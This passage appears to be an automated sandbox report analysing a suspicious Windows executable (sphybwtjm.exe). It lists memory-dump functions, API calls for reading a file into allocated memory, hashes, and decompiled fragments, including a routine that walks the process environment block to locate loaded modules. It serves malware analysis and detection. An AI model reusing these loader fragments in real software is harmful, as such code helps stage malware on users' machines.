Uniqueness

Uniqueness Score: -1.00%

Function 00700FC7 Relevance: 10.7, APIs: 7, Instructions: 192
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,00000000,7F91A078,00000000,7F951704,00000000,7FE1F1FB,00000000,7FE7F840,00000000), ref: 00701090
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,007011DF,7FAB7E30,00700AAE,00000000,00000002,00000000,00000000,000F001F), ref: 007010BA
ReadFile.KERNELBASE(00000000,00000000,00000000,7FAB7E30,00000000,?,?,?,?,007011DF,7FAB7E30,00700AAE,00000000,00000002,00000000,00000000), ref: 007010D1
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,007011DF,7FAB7E30,00700AAE,00000000,00000002,00000000,00000000,000F001F), ref: 007010F5
FindCloseChangeNotification.KERNELBASE(00000000,00700661,00000000,?,?,?,?,007011DF,7FAB7E30,00700AAE,00000000,00000002,00000000,00000000,000F001F,00000000), ref: 00701165
VirtualFree.KERNELBASE(00000000,00000000,00008000,00700661,00000000,?,?,?,?,007011DF,7FAB7E30,00700AAE,00000000,00000002,00000000,00000000), ref: 00701170
VirtualFree.KERNELBASE(00700661,00000000,00008000,?,?,?,?,007011DF,7FAB7E30,00700AAE,00000000,00000002,00000000,00000000,000F001F,00000000), ref: 007011B7

Memory Dump Source

Source File: 00000001.00000002.266498029.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_700000_sphybwtjm.jbxd

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: 3c61095c94c31d5f46135dfec5c3cd8676b2e06bc681ef983d85b1bfbfc2ae6c
Instruction ID: fb685decfd93ce93f2cfe5b8656b7c9e4c092dee1bed4c7d4bd9c8ccd0263a70
Opcode Fuzzy Hash: 3c61095c94c31d5f46135dfec5c3cd8676b2e06bc681ef983d85b1bfbfc2ae6c
Instruction Fuzzy Hash: 31515F71E00219EBDB14DBB4CC49BAEB7B9EF09714F544615FA11F7280E7789D018BA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00700149 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.266498029.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_700000_sphybwtjm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99f7f8a727c11264525f8cb6de1cb7337fd0f498ccee2e52288f3cdfd2a68309
Instruction ID: 13588fec4b5c641d75bcd0c3a4625205fcc9c18feb02d5d60ea045d848336073
Opcode Fuzzy Hash: 99f7f8a727c11264525f8cb6de1cb7337fd0f498ccee2e52288f3cdfd2a68309
Instruction Fuzzy Hash: B1218136600218EFD710DF69C884AAEB7E9EF98364F148526F946DB351E674DE00DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0070007A Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.266498029.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_700000_sphybwtjm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13604c29325f2004163b2aa178d0763ca0500bc422fb4823b0b3684db1ed90d5
Instruction ID: 1b391a1da2c67517b7b5fa5e10bf9a51e0983a83ccafbe3a3ee1eb09cf1d3385
Opcode Fuzzy Hash: 13604c29325f2004163b2aa178d0763ca0500bc422fb4823b0b3684db1ed90d5
Instruction Fuzzy Hash: 31E01A35360649EFCB00CBA8C985E55B3E8EB08368B144390F916D73E1E678ED00DA50

Uniqueness

Uniqueness Score: -1.00%

Function 00700019 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.266498029.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_700000_sphybwtjm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc0bda6141fd36cf9d678f032adb249b3112c4c6bd4a6d514cefce2705d38c4d
Instruction ID: 674611eb413f6ecc6a9426cd0060a3a1bcfeafa93349dd77fc7fcf535849dda0
Opcode Fuzzy Hash: dc0bda6141fd36cf9d678f032adb249b3112c4c6bd4a6d514cefce2705d38c4d
Instruction Fuzzy Hash: 23E04F32210514DBC7619B59C804E9BF7E8EB887B0B054525E94997661D679FC00C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00A311A0 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A311A0() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}

0x00a311b7

Memory Dump Source

Source File: 00000001.00000002.266696802.0000000000A31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000001.00000002.266688157.0000000000A30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.266718154.0000000000A3F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.266726016.0000000000A41000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a30000_sphybwtjm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80

Uniqueness

Uniqueness Score: -1.00%

Function 00700005 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.266498029.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_700000_sphybwtjm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: sphybwtjm.exePID: 3760, Parent PID: 4444COMMON

Executed Functions

Function 01589540 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0158954A

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f9175c5bf98e325ded0a00c5f859a8ddccb5512af3ddf60d30cbf1b77495e50
Instruction ID: f4522bb668e562968cd10756f134a263efeb987590d506c039f04c0bf711c459
Opcode Fuzzy Hash: 4f9175c5bf98e325ded0a00c5f859a8ddccb5512af3ddf60d30cbf1b77495e50
Instruction Fuzzy Hash: EA900265251040030605A59947045070096B7D5391351C421F1005950CD6618C616172

Uniqueness

Uniqueness Score: -1.00%

Function 01589910 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0158991A

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d243cf44586770cee7425668c47b3d4b72752896aee76580d043bc387e4e5300
Instruction ID: df4a423786e66fb48ba6545d5b7fdc1593df4f517b202156780d0b73198a7b97
Opcode Fuzzy Hash: d243cf44586770cee7425668c47b3d4b72752896aee76580d043bc387e4e5300
Instruction Fuzzy Hash: A89002B124104402D640719985047460055B7D0341F51C411A5054954EC6998DD576B6

Uniqueness

Uniqueness Score: -1.00%

Function 015895D0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 015895DA

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f04fd7f6eadd23d4ab8f3b2fb07f0da801cb52fd25078559bacf20653828116
Instruction ID: 2eb850af6f01693a2cd81deff0e07460c0379969ce102881ac678c765d369110
Opcode Fuzzy Hash: 5f04fd7f6eadd23d4ab8f3b2fb07f0da801cb52fd25078559bacf20653828116
Instruction Fuzzy Hash: F09002A124204003460571998514616405AB7E0241B51C421E1004990DC5658C917176

Uniqueness

Uniqueness Score: -1.00%

Function 015899A0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 015899AA

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2eef0f925fbe437219dfcd47449f528eed63bfccb938ca1227f0ced55caf14d7
Instruction ID: 62d1c6b59fca424c519fff87de7c87c514185b2f28babca2ec40b356ff989bfa
Opcode Fuzzy Hash: 2eef0f925fbe437219dfcd47449f528eed63bfccb938ca1227f0ced55caf14d7
Instruction Fuzzy Hash: A59002A138104442D60061998514B060055F7E1341F51C415E1054954DC659CC527177

Uniqueness

Uniqueness Score: -1.00%

Function 01589840 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0158984A

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 360cb600170a48e5232f9d450a54e63edebfa6147d44ef2a62ae803df2d593dc
Instruction ID: 8f99c65da07fa567f449d789d9a0b47437b99ca3bfd2fbb437536c1626e35a30
Opcode Fuzzy Hash: 360cb600170a48e5232f9d450a54e63edebfa6147d44ef2a62ae803df2d593dc
Instruction Fuzzy Hash: C6900261282081525A45B19985045074056B7E0281791C412A1404D50CC5669C56E672

Uniqueness

Uniqueness Score: -1.00%

Function 01589860 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0158986A

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d44758347cbbce3fc4b6e61929a70540f1acab7d1afd5a02607e47f3c68f3341
Instruction ID: 93398b016fde6595f717ed73c0e7787aa7a661aa91dde1ae39366c80488e45fa
Opcode Fuzzy Hash: d44758347cbbce3fc4b6e61929a70540f1acab7d1afd5a02607e47f3c68f3341
Instruction Fuzzy Hash: 4790027124104413D611619986047070059B7D0281F91C812A0414958DD6968D52B172

Uniqueness

Uniqueness Score: -1.00%

Function 015898F0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 015898FA

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d4542be539bc066f493fb3f6e1a7c7a7079fefa802d6f8ab18d47a3e51913962
Instruction ID: a3969e25a81c9c8daa9dadafc93c74c7d12ec2870f5dc898ecb191b9fe3341e8
Opcode Fuzzy Hash: d4542be539bc066f493fb3f6e1a7c7a7079fefa802d6f8ab18d47a3e51913962
Instruction Fuzzy Hash: ED90026164104502D60171998504616005AB7D0281F91C422A1014955ECA658D92B172

Uniqueness

Uniqueness Score: -1.00%

Function 01589710 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0158971A

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c3ccd1bea1fd5728da8a9c5e083796393c353c85387d0d07ae29e8fd86ee0eaf
Instruction ID: 6d5e1d90813e7ba6041cc77affdd97489238cfd4920383a0151194c3ee8cbab6
Opcode Fuzzy Hash: c3ccd1bea1fd5728da8a9c5e083796393c353c85387d0d07ae29e8fd86ee0eaf
Instruction Fuzzy Hash: 4490027124104402D60065D995086460055B7E0341F51D411A5014955EC6A58C917172

Uniqueness

Uniqueness Score: -1.00%

Function 01589FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01589FEA

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c0d8dda06bad6a9a20143921753aee562e4d21cf93b816cda37f579bcdcff7f0
Instruction ID: 9202234c432986aebdd746e704087c6694d435a800bea9f33f9653bda168ff87
Opcode Fuzzy Hash: c0d8dda06bad6a9a20143921753aee562e4d21cf93b816cda37f579bcdcff7f0
Instruction Fuzzy Hash: 1F90027135118402D6106199C5047060055B7D1241F51C811A0814958DC6D58C917173

Uniqueness

Uniqueness Score: -1.00%

Function 01589780 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0158978A

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c439d62ec2e34818ac43b8814ceb4be7cc9e229065fab71c5129230e2e9b7c5
Instruction ID: 7792bf323108a2868bc82c8332cfa8fb72095d9c1f1888caee473de717ba55b1
Opcode Fuzzy Hash: 2c439d62ec2e34818ac43b8814ceb4be7cc9e229065fab71c5129230e2e9b7c5
Instruction Fuzzy Hash: 6A90026925304002D6807199950860A0055B7D1242F91D815A0005958CC9558C696372

Uniqueness

Uniqueness Score: -1.00%

Function 015897A0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 015897AA

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9edcdbdefd96a4358a0ba5df20fe86e358c1da0734d1189674c3598712e9cc52
Instruction ID: 05fad36e43f878156ed990ced9ef8573024462747a849bf127bd5a344ada6431
Opcode Fuzzy Hash: 9edcdbdefd96a4358a0ba5df20fe86e358c1da0734d1189674c3598712e9cc52
Instruction Fuzzy Hash: 2A90026134104003D640719995186064055F7E1341F51D411E0404954CD9558C566273

Uniqueness

Uniqueness Score: -1.00%

Function 01589A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01589A5A

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7cdc57c7ee4bc46ac81b0ebbda1efddbdea9c58e31a93a17dabeae822b9de5af
Instruction ID: 12721ceba4b4cb702294a3a58fb05f1e6dca2007818fdeafadd4077f846063aa
Opcode Fuzzy Hash: 7cdc57c7ee4bc46ac81b0ebbda1efddbdea9c58e31a93a17dabeae822b9de5af
Instruction Fuzzy Hash: 7890026125184042D70065A98D14B070055B7D0343F51C515A0144954CC9558C616572

Uniqueness

Uniqueness Score: -1.00%

Function 01589660 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0158966A

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c95720cdad22f22c49988277df2884bafb90678c9bd5d5ac6f3dd38b69787715
Instruction ID: 707627362c6a7eeef3a2b303204c1c3583549dcf47c52f34a6852384a43541f5
Opcode Fuzzy Hash: c95720cdad22f22c49988277df2884bafb90678c9bd5d5ac6f3dd38b69787715
Instruction Fuzzy Hash: F490027124104802D6807199850464A0055B7D1341F91C415A0015A54DCA558E5977F2

Uniqueness

Uniqueness Score: -1.00%

Function 01589A00 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01589A0A

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: adf38219fac9a74d9d2f1da69794e5530fcd84d710f9985fed3ad3a7a0073c21
Instruction ID: 03473fa97a8b4330b351b881a872f033be9a52169affe87b2ba34b0ad6bf981c
Opcode Fuzzy Hash: adf38219fac9a74d9d2f1da69794e5530fcd84d710f9985fed3ad3a7a0073c21
Instruction Fuzzy Hash: 8E90027124144402D6006199891470B0055B7D0342F51C411A1154955DC6658C5175B2

Uniqueness

Uniqueness Score: -1.00%

Function 01589A20 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01589A2A

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 264a65e10c34460985a0b996bcbbcbefb55c1a687965cac6ffa6519b92e8f96c
Instruction ID: 2a9a74737b86f930acf7f2f54f2d21fdaca458f36e9ca0b740576e17b5f57426
Opcode Fuzzy Hash: 264a65e10c34460985a0b996bcbbcbefb55c1a687965cac6ffa6519b92e8f96c
Instruction Fuzzy Hash: 0690026164104042464071A9C9449064055BBE1251751C521A0988950DC5998C6566B6

Uniqueness

Uniqueness Score: -1.00%

Function 015896E0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 015896EA

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a92f4a33807a06fb06beca4f2001b06bab71cb409bc31d7f46dd1654ebc9f148
Instruction ID: 93ce7b21f2500fb2c4f2c46d4a338b20b4727a22b16757ba4141fee88706d8cc
Opcode Fuzzy Hash: a92f4a33807a06fb06beca4f2001b06bab71cb409bc31d7f46dd1654ebc9f148
Instruction Fuzzy Hash: 519002712410C802D6106199C50474A0055B7D0341F55C811A4414A58DC6D58C917172

Uniqueness

Uniqueness Score: -1.00%

Function 0158967A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01589694

Memory Dump Source

Source File: 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: true

Associated: 00000002.00000002.349911036.000000000163B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1520000_sphybwtjm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ba292c19c73ced9cd4c37fe772a14478b0b7501c25ef50bb1de552beddc1760f
Instruction ID: 1e9fbd4c315a8daf0e9d62012318e276e2bbb30c2b28bac0ee909fc91a7d94de
Opcode Fuzzy Hash: ba292c19c73ced9cd4c37fe772a14478b0b7501c25ef50bb1de552beddc1760f
Instruction Fuzzy Hash: 77B09B719414C5C5DB11E7A5470873B795077D0745F16C451D1021A41B4778C491F5B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01578E00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126
timeCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E01578E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x163d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1638464; // 0x772a0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1635780 & 0x00000003) != 0) {
							E015C5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1635780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0158B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1637984; // 0xfd2c10
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1638464; // 0x772a0110
					 *0x163b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01579B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1635780 & 0x00000005) != 0) {
						_push(_t49);
						E015C5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
